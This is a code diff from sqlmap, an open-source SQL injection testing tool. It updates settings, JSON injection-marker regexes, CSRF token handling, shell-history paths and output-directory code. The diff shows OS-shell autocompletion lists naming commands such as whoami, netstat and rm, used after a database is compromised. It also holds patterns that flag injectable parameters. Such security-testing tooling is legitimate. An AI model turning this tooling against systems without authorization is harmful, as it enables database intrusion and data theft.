DUMMY_NON_SQLI_CHECK_APPENDIX = "<'\">"
|
DUMMY_NON_SQLI_CHECK_APPENDIX = "<'\">"
|
||||||
|
|
||||||
# Regular expression used for recognition of file inclusion errors
|
# Regular expression used for recognition of file inclusion errors
|
||||||
FI_ERROR_REGEX = "(?i)[^\n]{0,100}(no such file|failed (to )?open)[^\n]{0,100}"
|
FI_ERROR_REGEX = r"(?i)[^\n]{0,100}(no such file|failed (to )?open)[^\n]{0,100}"
|
||||||
|
|
||||||
# Length of prefix and suffix used in non-SQLI heuristic checks
|
# Length of prefix and suffix used in non-SQLI heuristic checks
|
||||||
NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH = 6
|
NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH = 6
|
||||||
@@ -612,7 +640,7 @@ NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH = 6
|
|||||||
MAX_CONNECTION_CHUNK_SIZE = 10 * 1024 * 1024
|
MAX_CONNECTION_CHUNK_SIZE = 10 * 1024 * 1024
|
||||||
|
|
||||||
# Maximum response total page size (trimmed if larger)
|
# Maximum response total page size (trimmed if larger)
|
||||||
MAX_CONNECTION_TOTAL_SIZE = 50 * 1024 * 1024
|
MAX_CONNECTION_TOTAL_SIZE = 100 * 1024 * 1024
|
||||||
|
|
||||||
# For preventing MemoryError exceptions (caused when using large sequences in difflib.SequenceMatcher)
|
# For preventing MemoryError exceptions (caused when using large sequences in difflib.SequenceMatcher)
|
||||||
MAX_DIFFLIB_SEQUENCE_LENGTH = 10 * 1024 * 1024
|
MAX_DIFFLIB_SEQUENCE_LENGTH = 10 * 1024 * 1024
|
||||||
@@ -633,7 +661,7 @@ VALID_TIME_CHARS_RUN_THRESHOLD = 100
|
|||||||
CHECK_ZERO_COLUMNS_THRESHOLD = 10
|
CHECK_ZERO_COLUMNS_THRESHOLD = 10
|
||||||
|
|
||||||
# Boldify all logger messages containing these "patterns"
|
# Boldify all logger messages containing these "patterns"
|
||||||
BOLD_PATTERNS = ("' injectable", "provided empty", "leftover chars", "might be injectable", "' is vulnerable", "is not injectable", "does not seem to be", "test failed", "test passed", "live test final result", "test shows that", "the back-end DBMS is", "created Github", "blocked by the target server", "protection is involved", "CAPTCHA", "specific response")
|
BOLD_PATTERNS = ("' injectable", "provided empty", "leftover chars", "might be injectable", "' is vulnerable", "is not injectable", "does not seem to be", "test failed", "test passed", "live test final result", "test shows that", "the back-end DBMS is", "created Github", "blocked by the target server", "protection is involved", "CAPTCHA", "specific response", "NULL connection is supported")
|
||||||
|
|
||||||
# Generic www root directory names
|
# Generic www root directory names
|
||||||
GENERIC_DOC_ROOT_DIRECTORY_NAMES = ("htdocs", "httpdocs", "public", "wwwroot", "www")
|
GENERIC_DOC_ROOT_DIRECTORY_NAMES = ("htdocs", "httpdocs", "public", "wwwroot", "www")
|
||||||
@@ -672,7 +700,7 @@ INVALID_UNICODE_CHAR_FORMAT = r"\x%02x"
|
|||||||
XML_RECOGNITION_REGEX = r"(?s)\A\s*<[^>]+>(.+>)?\s*\Z"
|
XML_RECOGNITION_REGEX = r"(?s)\A\s*<[^>]+>(.+>)?\s*\Z"
|
||||||
|
|
||||||
# Regular expression used for detecting JSON POST data
|
# Regular expression used for detecting JSON POST data
|
||||||
JSON_RECOGNITION_REGEX = r'(?s)\A(\s*\[)*\s*\{.*"[^"]+"\s*:\s*("[^"]+"|\d+).*\}\s*(\]\s*)*\Z'
|
JSON_RECOGNITION_REGEX = r'(?s)\A(\s*\[)*\s*\{.*"[^"]+"\s*:\s*("[^"]*"|\d+|true|false|null).*\}\s*(\]\s*)*\Z'
|
||||||
|
|
||||||
# Regular expression used for detecting JSON-like POST data
|
# Regular expression used for detecting JSON-like POST data
|
||||||
JSON_LIKE_RECOGNITION_REGEX = r"(?s)\A(\s*\[)*\s*\{.*'[^']+'\s*:\s*('[^']+'|\d+).*\}\s*(\]\s*)*\Z"
|
JSON_LIKE_RECOGNITION_REGEX = r"(?s)\A(\s*\[)*\s*\{.*'[^']+'\s*:\s*('[^']+'|\d+).*\}\s*(\]\s*)*\Z"
|
||||||
|
|||||||
@@ -1,8 +1,8 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import atexit
|
import atexit
|
||||||
@@ -60,6 +60,8 @@ def saveHistory(completion=None):
|
|||||||
historyPath = paths.SQL_SHELL_HISTORY
|
historyPath = paths.SQL_SHELL_HISTORY
|
||||||
elif completion == AUTOCOMPLETE_TYPE.OS:
|
elif completion == AUTOCOMPLETE_TYPE.OS:
|
||||||
historyPath = paths.OS_SHELL_HISTORY
|
historyPath = paths.OS_SHELL_HISTORY
|
||||||
|
elif completion == AUTOCOMPLETE_TYPE.API:
|
||||||
|
historyPath = paths.API_SHELL_HISTORY
|
||||||
else:
|
else:
|
||||||
historyPath = paths.SQLMAP_SHELL_HISTORY
|
historyPath = paths.SQLMAP_SHELL_HISTORY
|
||||||
|
|
||||||
@@ -86,6 +88,8 @@ def loadHistory(completion=None):
|
|||||||
historyPath = paths.SQL_SHELL_HISTORY
|
historyPath = paths.SQL_SHELL_HISTORY
|
||||||
elif completion == AUTOCOMPLETE_TYPE.OS:
|
elif completion == AUTOCOMPLETE_TYPE.OS:
|
||||||
historyPath = paths.OS_SHELL_HISTORY
|
historyPath = paths.OS_SHELL_HISTORY
|
||||||
|
elif completion == AUTOCOMPLETE_TYPE.API:
|
||||||
|
historyPath = paths.API_SHELL_HISTORY
|
||||||
else:
|
else:
|
||||||
historyPath = paths.SQLMAP_SHELL_HISTORY
|
historyPath = paths.SQLMAP_SHELL_HISTORY
|
||||||
|
|
||||||
@@ -104,20 +108,20 @@ def autoCompletion(completion=None, os=None, commands=None):
|
|||||||
if os == OS.WINDOWS:
|
if os == OS.WINDOWS:
|
||||||
# Reference: http://en.wikipedia.org/wiki/List_of_DOS_commands
|
# Reference: http://en.wikipedia.org/wiki/List_of_DOS_commands
|
||||||
completer = CompleterNG({
|
completer = CompleterNG({
|
||||||
"copy": None, "del": None, "dir": None,
|
"copy": None, "del": None, "dir": None,
|
||||||
"echo": None, "md": None, "mem": None,
|
"echo": None, "md": None, "mem": None,
|
||||||
"move": None, "net": None, "netstat -na": None,
|
"move": None, "net": None, "netstat -na": None,
|
||||||
"ver": None, "xcopy": None, "whoami": None,
|
"ver": None, "xcopy": None, "whoami": None,
|
||||||
})
|
})
|
||||||
|
|
||||||
else:
|
else:
|
||||||
# Reference: http://en.wikipedia.org/wiki/List_of_Unix_commands
|
# Reference: http://en.wikipedia.org/wiki/List_of_Unix_commands
|
||||||
completer = CompleterNG({
|
completer = CompleterNG({
|
||||||
"cp": None, "rm": None, "ls": None,
|
"cp": None, "rm": None, "ls": None,
|
||||||
"echo": None, "mkdir": None, "free": None,
|
"echo": None, "mkdir": None, "free": None,
|
||||||
"mv": None, "ifconfig": None, "netstat -natu": None,
|
"mv": None, "ifconfig": None, "netstat -natu": None,
|
||||||
"pwd": None, "uname": None, "id": None,
|
"pwd": None, "uname": None, "id": None,
|
||||||
})
|
})
|
||||||
|
|
||||||
readline.set_completer(completer.complete)
|
readline.set_completer(completer.complete)
|
||||||
readline.parse_and_bind("tab: complete")
|
readline.parse_and_bind("tab: complete")
|
||||||
|
|||||||
@@ -1,14 +1,13 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import errno
|
import errno
|
||||||
import os
|
import os
|
||||||
import subprocess
|
import subprocess
|
||||||
import sys
|
|
||||||
import time
|
import time
|
||||||
|
|
||||||
from lib.core.settings import IS_WIN
|
from lib.core.settings import IS_WIN
|
||||||
@@ -24,11 +23,6 @@ else:
|
|||||||
import select
|
import select
|
||||||
import fcntl
|
import fcntl
|
||||||
|
|
||||||
if (sys.hexversion >> 16) >= 0x202:
|
|
||||||
FCNTL = fcntl
|
|
||||||
else:
|
|
||||||
import FCNTL
|
|
||||||
|
|
||||||
def blockingReadFromFD(fd):
|
def blockingReadFromFD(fd):
|
||||||
# Quick twist around original Twisted function
|
# Quick twist around original Twisted function
|
||||||
# Blocking read from a non-blocking file descriptor
|
# Blocking read from a non-blocking file descriptor
|
||||||
|
|||||||
@@ -1,8 +1,8 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import codecs
|
import codecs
|
||||||
@@ -62,6 +62,7 @@ from lib.core.settings import PROBLEMATIC_CUSTOM_INJECTION_PATTERNS
|
|||||||
from lib.core.settings import REFERER_ALIASES
|
from lib.core.settings import REFERER_ALIASES
|
||||||
from lib.core.settings import RESTORE_MERGED_OPTIONS
|
from lib.core.settings import RESTORE_MERGED_OPTIONS
|
||||||
from lib.core.settings import RESULTS_FILE_FORMAT
|
from lib.core.settings import RESULTS_FILE_FORMAT
|
||||||
|
from lib.core.settings import SESSION_SQLITE_FILE
|
||||||
from lib.core.settings import SUPPORTED_DBMS
|
from lib.core.settings import SUPPORTED_DBMS
|
||||||
from lib.core.settings import UNENCODED_ORIGINAL_VALUE
|
from lib.core.settings import UNENCODED_ORIGINAL_VALUE
|
||||||
from lib.core.settings import UNICODE_ENCODING
|
from lib.core.settings import UNICODE_ENCODING
|
||||||
@@ -82,6 +83,7 @@ def _setRequestParams():
|
|||||||
conf.parameters[None] = "direct connection"
|
conf.parameters[None] = "direct connection"
|
||||||
return
|
return
|
||||||
|
|
||||||
|
hintNames = []
|
||||||
testableParameters = False
|
testableParameters = False
|
||||||
|
|
||||||
# Perform checks on GET parameters
|
# Perform checks on GET parameters
|
||||||
@@ -100,7 +102,6 @@ def _setRequestParams():
|
|||||||
|
|
||||||
if conf.data is not None:
|
if conf.data is not None:
|
||||||
conf.method = HTTPMETHOD.POST if not conf.method or conf.method == HTTPMETHOD.GET else conf.method
|
conf.method = HTTPMETHOD.POST if not conf.method or conf.method == HTTPMETHOD.GET else conf.method
|
||||||
hintNames = []
|
|
||||||
|
|
||||||
def process(match, repl):
|
def process(match, repl):
|
||||||
retVal = match.group(0)
|
retVal = match.group(0)
|
||||||
@@ -141,13 +142,14 @@ def _setRequestParams():
|
|||||||
if not (kb.processUserMarks and kb.customInjectionMark in conf.data):
|
if not (kb.processUserMarks and kb.customInjectionMark in conf.data):
|
||||||
conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data)
|
conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data)
|
||||||
conf.data = conf.data.replace(kb.customInjectionMark, ASTERISK_MARKER)
|
conf.data = conf.data.replace(kb.customInjectionMark, ASTERISK_MARKER)
|
||||||
conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*"[^"]+)"', functools.partial(process, repl=r'\g<1>%s"' % kb.customInjectionMark), conf.data)
|
conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*".+?)"(?<!\\")', functools.partial(process, repl=r'\g<1>%s"' % kb.customInjectionMark), conf.data)
|
||||||
conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*)(-?\d[\d\.]*\b)', functools.partial(process, repl=r'\g<0>%s' % kb.customInjectionMark), conf.data)
|
conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*)(-?\d[\d\.]*)\b', functools.partial(process, repl=r'\g<1>\g<3>%s' % kb.customInjectionMark), conf.data)
|
||||||
|
conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*)((true|false|null))\b', functools.partial(process, repl=r'\g<1>\g<3>%s' % kb.customInjectionMark), conf.data)
|
||||||
match = re.search(r'(?P<name>[^"]+)"\s*:\s*\[([^\]]+)\]', conf.data)
|
match = re.search(r'(?P<name>[^"]+)"\s*:\s*\[([^\]]+)\]', conf.data)
|
||||||
if match and not (conf.testParameter and match.group("name") not in conf.testParameter):
|
if match and not (conf.testParameter and match.group("name") not in conf.testParameter):
|
||||||
_ = match.group(2)
|
_ = match.group(2)
|
||||||
_ = re.sub(r'("[^"]+)"', '\g<1>%s"' % kb.customInjectionMark, _)
|
_ = re.sub(r'("[^"]+)"', r'\g<1>%s"' % kb.customInjectionMark, _)
|
||||||
_ = re.sub(r'(\A|,|\s+)(-?\d[\d\.]*\b)', '\g<0>%s' % kb.customInjectionMark, _)
|
_ = re.sub(r'(\A|,|\s+)(-?\d[\d\.]*\b)', r'\g<0>%s' % kb.customInjectionMark, _)
|
||||||
conf.data = conf.data.replace(match.group(0), match.group(0).replace(match.group(2), _))
|
conf.data = conf.data.replace(match.group(0), match.group(0).replace(match.group(2), _))
|
||||||
|
|
||||||
kb.postHint = POST_HINT.JSON
|
kb.postHint = POST_HINT.JSON
|
||||||
@@ -228,9 +230,9 @@ def _setRequestParams():
|
|||||||
if kb.customInjectionMark not in conf.data: # in case that no usable parameter values has been found
|
if kb.customInjectionMark not in conf.data: # in case that no usable parameter values has been found
|
||||||
conf.parameters[PLACE.POST] = conf.data
|
conf.parameters[PLACE.POST] = conf.data
|
||||||
|
|
||||||
kb.processUserMarks = True if (kb.postHint and kb.customInjectionMark in conf.data) else kb.processUserMarks
|
kb.processUserMarks = True if (kb.postHint and kb.customInjectionMark in (conf.data or "")) else kb.processUserMarks
|
||||||
|
|
||||||
if re.search(URI_INJECTABLE_REGEX, conf.url, re.I) and not any(place in conf.parameters for place in (PLACE.GET, PLACE.POST)) and not kb.postHint and not kb.customInjectionMark in (conf.data or "") and conf.url.startswith("http"):
|
if re.search(URI_INJECTABLE_REGEX, conf.url, re.I) and not any(place in conf.parameters for place in (PLACE.GET, PLACE.POST)) and not kb.postHint and kb.customInjectionMark not in (conf.data or "") and conf.url.startswith("http"):
|
||||||
warnMsg = "you've provided target URL without any GET "
|
warnMsg = "you've provided target URL without any GET "
|
||||||
warnMsg += "parameters (e.g. 'http://www.site.com/article.php?id=1') "
|
warnMsg += "parameters (e.g. 'http://www.site.com/article.php?id=1') "
|
||||||
warnMsg += "and without providing any POST parameters "
|
warnMsg += "and without providing any POST parameters "
|
||||||
@@ -375,7 +377,7 @@ def _setRequestParams():
|
|||||||
if condition:
|
if condition:
|
||||||
conf.parameters[PLACE.CUSTOM_HEADER] = str(conf.httpHeaders)
|
conf.parameters[PLACE.CUSTOM_HEADER] = str(conf.httpHeaders)
|
||||||
conf.paramDict[PLACE.CUSTOM_HEADER] = {httpHeader: "%s,%s%s" % (httpHeader, headerValue, kb.customInjectionMark)}
|
conf.paramDict[PLACE.CUSTOM_HEADER] = {httpHeader: "%s,%s%s" % (httpHeader, headerValue, kb.customInjectionMark)}
|
||||||
conf.httpHeaders = [(header, value.replace(kb.customInjectionMark, "")) for header, value in conf.httpHeaders]
|
conf.httpHeaders = [(_[0], _[1].replace(kb.customInjectionMark, "")) for _ in conf.httpHeaders]
|
||||||
testableParameters = True
|
testableParameters = True
|
||||||
|
|
||||||
if not conf.parameters:
|
if not conf.parameters:
|
||||||
@@ -389,12 +391,15 @@ def _setRequestParams():
|
|||||||
raise SqlmapGenericException(errMsg)
|
raise SqlmapGenericException(errMsg)
|
||||||
|
|
||||||
if conf.csrfToken:
|
if conf.csrfToken:
|
||||||
if not any(conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))) and not re.search(r"\b%s\b" % re.escape(conf.csrfToken), conf.data or "") and not conf.csrfToken in set(_[0].lower() for _ in conf.httpHeaders) and not conf.csrfToken in conf.paramDict.get(PLACE.COOKIE, {}):
|
if not any(conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))) and not re.search(r"\b%s\b" % re.escape(conf.csrfToken), conf.data or "") and conf.csrfToken not in set(_[0].lower() for _ in conf.httpHeaders) and conf.csrfToken not in conf.paramDict.get(PLACE.COOKIE, {}):
|
||||||
errMsg = "anti-CSRF token parameter '%s' not " % conf.csrfToken
|
errMsg = "anti-CSRF token parameter '%s' not " % conf.csrfToken
|
||||||
errMsg += "found in provided GET, POST, Cookie or header values"
|
errMsg += "found in provided GET, POST, Cookie or header values"
|
||||||
raise SqlmapGenericException(errMsg)
|
raise SqlmapGenericException(errMsg)
|
||||||
else:
|
else:
|
||||||
for place in (PLACE.GET, PLACE.POST, PLACE.COOKIE):
|
for place in (PLACE.GET, PLACE.POST, PLACE.COOKIE):
|
||||||
|
if conf.csrfToken:
|
||||||
|
break
|
||||||
|
|
||||||
for parameter in conf.paramDict.get(place, {}):
|
for parameter in conf.paramDict.get(place, {}):
|
||||||
if any(parameter.lower().count(_) for _ in CSRF_TOKEN_PARAMETER_INFIXES):
|
if any(parameter.lower().count(_) for _ in CSRF_TOKEN_PARAMETER_INFIXES):
|
||||||
message = "%s parameter '%s' appears to hold anti-CSRF token. " % (place, parameter)
|
message = "%s parameter '%s' appears to hold anti-CSRF token. " % (place, parameter)
|
||||||
@@ -402,7 +407,7 @@ def _setRequestParams():
|
|||||||
|
|
||||||
if readInput(message, default='N', boolean=True):
|
if readInput(message, default='N', boolean=True):
|
||||||
conf.csrfToken = getUnicode(parameter)
|
conf.csrfToken = getUnicode(parameter)
|
||||||
break
|
break
|
||||||
|
|
||||||
def _setHashDB():
|
def _setHashDB():
|
||||||
"""
|
"""
|
||||||
@@ -410,7 +415,7 @@ def _setHashDB():
|
|||||||
"""
|
"""
|
||||||
|
|
||||||
if not conf.hashDBFile:
|
if not conf.hashDBFile:
|
||||||
conf.hashDBFile = conf.sessionFile or os.path.join(conf.outputPath, "session.sqlite")
|
conf.hashDBFile = conf.sessionFile or os.path.join(conf.outputPath, SESSION_SQLITE_FILE)
|
||||||
|
|
||||||
if os.path.exists(conf.hashDBFile):
|
if os.path.exists(conf.hashDBFile):
|
||||||
if conf.flushSession:
|
if conf.flushSession:
|
||||||
@@ -444,13 +449,10 @@ def _resumeHashDBValues():
|
|||||||
conf.tmpPath = conf.tmpPath or hashDBRetrieve(HASHDB_KEYS.CONF_TMP_PATH)
|
conf.tmpPath = conf.tmpPath or hashDBRetrieve(HASHDB_KEYS.CONF_TMP_PATH)
|
||||||
|
|
||||||
for injection in hashDBRetrieve(HASHDB_KEYS.KB_INJECTIONS, True) or []:
|
for injection in hashDBRetrieve(HASHDB_KEYS.KB_INJECTIONS, True) or []:
|
||||||
if isinstance(injection, InjectionDict) and injection.place in conf.paramDict and \
|
if isinstance(injection, InjectionDict) and injection.place in conf.paramDict and injection.parameter in conf.paramDict[injection.place]:
|
||||||
injection.parameter in conf.paramDict[injection.place]:
|
|
||||||
|
|
||||||
if not conf.tech or intersect(conf.tech, injection.data.keys()):
|
if not conf.tech or intersect(conf.tech, injection.data.keys()):
|
||||||
if intersect(conf.tech, injection.data.keys()):
|
if intersect(conf.tech, injection.data.keys()):
|
||||||
injection.data = dict(_ for _ in injection.data.items() if _[0] in conf.tech)
|
injection.data = dict(_ for _ in injection.data.items() if _[0] in conf.tech)
|
||||||
|
|
||||||
if injection not in kb.injections:
|
if injection not in kb.injections:
|
||||||
kb.injections.append(injection)
|
kb.injections.append(injection)
|
||||||
|
|
||||||
@@ -544,7 +546,7 @@ def _setResultsFile():
|
|||||||
if not conf.resultsFP:
|
if not conf.resultsFP:
|
||||||
conf.resultsFilename = os.path.join(paths.SQLMAP_OUTPUT_PATH, time.strftime(RESULTS_FILE_FORMAT).lower())
|
conf.resultsFilename = os.path.join(paths.SQLMAP_OUTPUT_PATH, time.strftime(RESULTS_FILE_FORMAT).lower())
|
||||||
try:
|
try:
|
||||||
conf.resultsFP = openFile(conf.resultsFilename, "w+", UNICODE_ENCODING, buffering=0)
|
conf.resultsFP = openFile(conf.resultsFilename, "a", UNICODE_ENCODING, buffering=0)
|
||||||
except (OSError, IOError), ex:
|
except (OSError, IOError), ex:
|
||||||
try:
|
try:
|
||||||
warnMsg = "unable to create results file '%s' ('%s'). " % (conf.resultsFilename, getUnicode(ex))
|
warnMsg = "unable to create results file '%s' ('%s'). " % (conf.resultsFilename, getUnicode(ex))
|
||||||
@@ -576,7 +578,7 @@ def _createFilesDir():
|
|||||||
|
|
||||||
if not os.path.isdir(conf.filePath):
|
if not os.path.isdir(conf.filePath):
|
||||||
try:
|
try:
|
||||||
os.makedirs(conf.filePath, 0755)
|
os.makedirs(conf.filePath)
|
||||||
except OSError, ex:
|
except OSError, ex:
|
||||||
tempDir = tempfile.mkdtemp(prefix="sqlmapfiles")
|
tempDir = tempfile.mkdtemp(prefix="sqlmapfiles")
|
||||||
warnMsg = "unable to create files directory "
|
warnMsg = "unable to create files directory "
|
||||||
@@ -598,7 +600,7 @@ def _createDumpDir():
|
|||||||
|
|
||||||
if not os.path.isdir(conf.dumpPath):
|
if not os.path.isdir(conf.dumpPath):
|
||||||
try:
|
try:
|
||||||
os.makedirs(conf.dumpPath, 0755)
|
os.makedirs(conf.dumpPath)
|
||||||
except OSError, ex:
|
except OSError, ex:
|
||||||
tempDir = tempfile.mkdtemp(prefix="sqlmapdump")
|
tempDir = tempfile.mkdtemp(prefix="sqlmapdump")
|
||||||
warnMsg = "unable to create dump directory "
|
warnMsg = "unable to create dump directory "
|
||||||
@@ -617,18 +619,42 @@ def _createTargetDirs():
|
|||||||
Create the output directory.
|
Create the output directory.
|
||||||
"""
|
"""
|
||||||
|
|
||||||
try:
|
for context in "output", "history":
|
||||||
if not os.path.isdir(paths.SQLMAP_OUTPUT_PATH):
|
directory = paths["SQLMAP_%s_PATH" % context.upper()]
|
||||||
os.makedirs(paths.SQLMAP_OUTPUT_PATH, 0755)
|
try:
|
||||||
|
if not os.path.isdir(directory):
|
||||||
|
os.makedirs(directory)
|
||||||
|
|
||||||
_ = os.path.join(paths.SQLMAP_OUTPUT_PATH, randomStr())
|
_ = os.path.join(directory, randomStr())
|
||||||
open(_, "w+b").close()
|
open(_, "w+b").close()
|
||||||
os.remove(_)
|
os.remove(_)
|
||||||
|
|
||||||
if conf.outputDir:
|
if conf.outputDir and context == "output":
|
||||||
warnMsg = "using '%s' as the output directory" % paths.SQLMAP_OUTPUT_PATH
|
warnMsg = "using '%s' as the %s directory" % (directory, context)
|
||||||
|
logger.warn(warnMsg)
|
||||||
|
except (OSError, IOError), ex:
|
||||||
|
try:
|
||||||
|
tempDir = tempfile.mkdtemp(prefix="sqlmap%s" % context)
|
||||||
|
except Exception, _:
|
||||||
|
errMsg = "unable to write to the temporary directory ('%s'). " % _
|
||||||
|
errMsg += "Please make sure that your disk is not full and "
|
||||||
|
errMsg += "that you have sufficient write permissions to "
|
||||||
|
errMsg += "create temporary files and/or directories"
|
||||||
|
raise SqlmapSystemException(errMsg)
|
||||||
|
|
||||||
|
warnMsg = "unable to %s %s directory " % ("create" if not os.path.isdir(directory) else "write to the", context)
|
||||||
|
warnMsg += "'%s' (%s). " % (directory, getUnicode(ex))
|
||||||
|
warnMsg += "Using temporary directory '%s' instead" % getUnicode(tempDir)
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
except (OSError, IOError), ex:
|
|
||||||
|
paths["SQLMAP_%s_PATH" % context.upper()] = tempDir
|
||||||
|
|
||||||
|
conf.outputPath = os.path.join(getUnicode(paths.SQLMAP_OUTPUT_PATH), normalizeUnicode(getUnicode(conf.hostname)))
|
||||||
|
|
||||||
|
try:
|
||||||
|
if not os.path.isdir(conf.outputPath):
|
||||||
|
os.makedirs(conf.outputPath)
|
||||||
|
except (OSError, IOError, TypeError), ex:
|
||||||
try:
|
try:
|
||||||
tempDir = tempfile.mkdtemp(prefix="sqlmapoutput")
|
tempDir = tempfile.mkdtemp(prefix="sqlmapoutput")
|
||||||
except Exception, _:
|
except Exception, _:
|
||||||
@@ -638,34 +664,14 @@ def _createTargetDirs():
|
|||||||
errMsg += "create temporary files and/or directories"
|
errMsg += "create temporary files and/or directories"
|
||||||
raise SqlmapSystemException(errMsg)
|
raise SqlmapSystemException(errMsg)
|
||||||
|
|
||||||
warnMsg = "unable to %s output directory " % ("create" if not os.path.isdir(paths.SQLMAP_OUTPUT_PATH) else "write to the")
|
warnMsg = "unable to create output directory "
|
||||||
warnMsg += "'%s' (%s). " % (paths.SQLMAP_OUTPUT_PATH, getUnicode(ex))
|
warnMsg += "'%s' (%s). " % (conf.outputPath, getUnicode(ex))
|
||||||
warnMsg += "Using temporary directory '%s' instead" % getUnicode(tempDir)
|
warnMsg += "Using temporary directory '%s' instead" % getUnicode(tempDir)
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
paths.SQLMAP_OUTPUT_PATH = tempDir
|
conf.outputPath = tempDir
|
||||||
|
|
||||||
conf.outputPath = os.path.join(getUnicode(paths.SQLMAP_OUTPUT_PATH), normalizeUnicode(getUnicode(conf.hostname)))
|
conf.outputPath = getUnicode(conf.outputPath)
|
||||||
|
|
||||||
if not os.path.isdir(conf.outputPath):
|
|
||||||
try:
|
|
||||||
os.makedirs(conf.outputPath, 0755)
|
|
||||||
except (OSError, IOError), ex:
|
|
||||||
try:
|
|
||||||
tempDir = tempfile.mkdtemp(prefix="sqlmapoutput")
|
|
||||||
except Exception, _:
|
|
||||||
errMsg = "unable to write to the temporary directory ('%s'). " % _
|
|
||||||
errMsg += "Please make sure that your disk is not full and "
|
|
||||||
errMsg += "that you have sufficient write permissions to "
|
|
||||||
errMsg += "create temporary files and/or directories"
|
|
||||||
raise SqlmapSystemException(errMsg)
|
|
||||||
|
|
||||||
warnMsg = "unable to create output directory "
|
|
||||||
warnMsg += "'%s' (%s). " % (conf.outputPath, getUnicode(ex))
|
|
||||||
warnMsg += "Using temporary directory '%s' instead" % getUnicode(tempDir)
|
|
||||||
logger.warn(warnMsg)
|
|
||||||
|
|
||||||
conf.outputPath = tempDir
|
|
||||||
|
|
||||||
try:
|
try:
|
||||||
with codecs.open(os.path.join(conf.outputPath, "target.txt"), "w+", UNICODE_ENCODING) as f:
|
with codecs.open(os.path.join(conf.outputPath, "target.txt"), "w+", UNICODE_ENCODING) as f:
|
||||||
|
|||||||
@@ -1,8 +1,8 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import codecs
|
import codecs
|
||||||
|
|||||||
@@ -1,8 +1,8 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import difflib
|
import difflib
|
||||||
@@ -64,9 +64,6 @@ class _ThreadData(threading.local):
|
|||||||
|
|
||||||
ThreadData = _ThreadData()
|
ThreadData = _ThreadData()
|
||||||
|
|
||||||
def getCurrentThreadUID():
|
|
||||||
return hash(threading.currentThread())
|
|
||||||
|
|
||||||
def readInput(message, default=None, checkBatch=True, boolean=False):
|
def readInput(message, default=None, checkBatch=True, boolean=False):
|
||||||
# It will be overwritten by original from lib.core.common
|
# It will be overwritten by original from lib.core.common
|
||||||
pass
|
pass
|
||||||
@@ -98,6 +95,9 @@ def exceptionHandledFunction(threadFunction, silent=False):
|
|||||||
if not silent:
|
if not silent:
|
||||||
logger.error("thread %s: %s" % (threading.currentThread().getName(), ex.message))
|
logger.error("thread %s: %s" % (threading.currentThread().getName(), ex.message))
|
||||||
|
|
||||||
|
if conf.verbose > 1:
|
||||||
|
traceback.print_exc()
|
||||||
|
|
||||||
def setDaemon(thread):
|
def setDaemon(thread):
|
||||||
# Reference: http://stackoverflow.com/questions/190010/daemon-threads-explanation
|
# Reference: http://stackoverflow.com/questions/190010/daemon-threads-explanation
|
||||||
if PYVERSION >= "2.6":
|
if PYVERSION >= "2.6":
|
||||||
@@ -168,6 +168,7 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio
|
|||||||
|
|
||||||
except (KeyboardInterrupt, SqlmapUserQuitException), ex:
|
except (KeyboardInterrupt, SqlmapUserQuitException), ex:
|
||||||
print
|
print
|
||||||
|
kb.prependFlag = False
|
||||||
kb.threadContinue = False
|
kb.threadContinue = False
|
||||||
kb.threadException = True
|
kb.threadException = True
|
||||||
|
|
||||||
@@ -188,6 +189,9 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio
|
|||||||
kb.threadException = True
|
kb.threadException = True
|
||||||
logger.error("thread %s: %s" % (threading.currentThread().getName(), ex.message))
|
logger.error("thread %s: %s" % (threading.currentThread().getName(), ex.message))
|
||||||
|
|
||||||
|
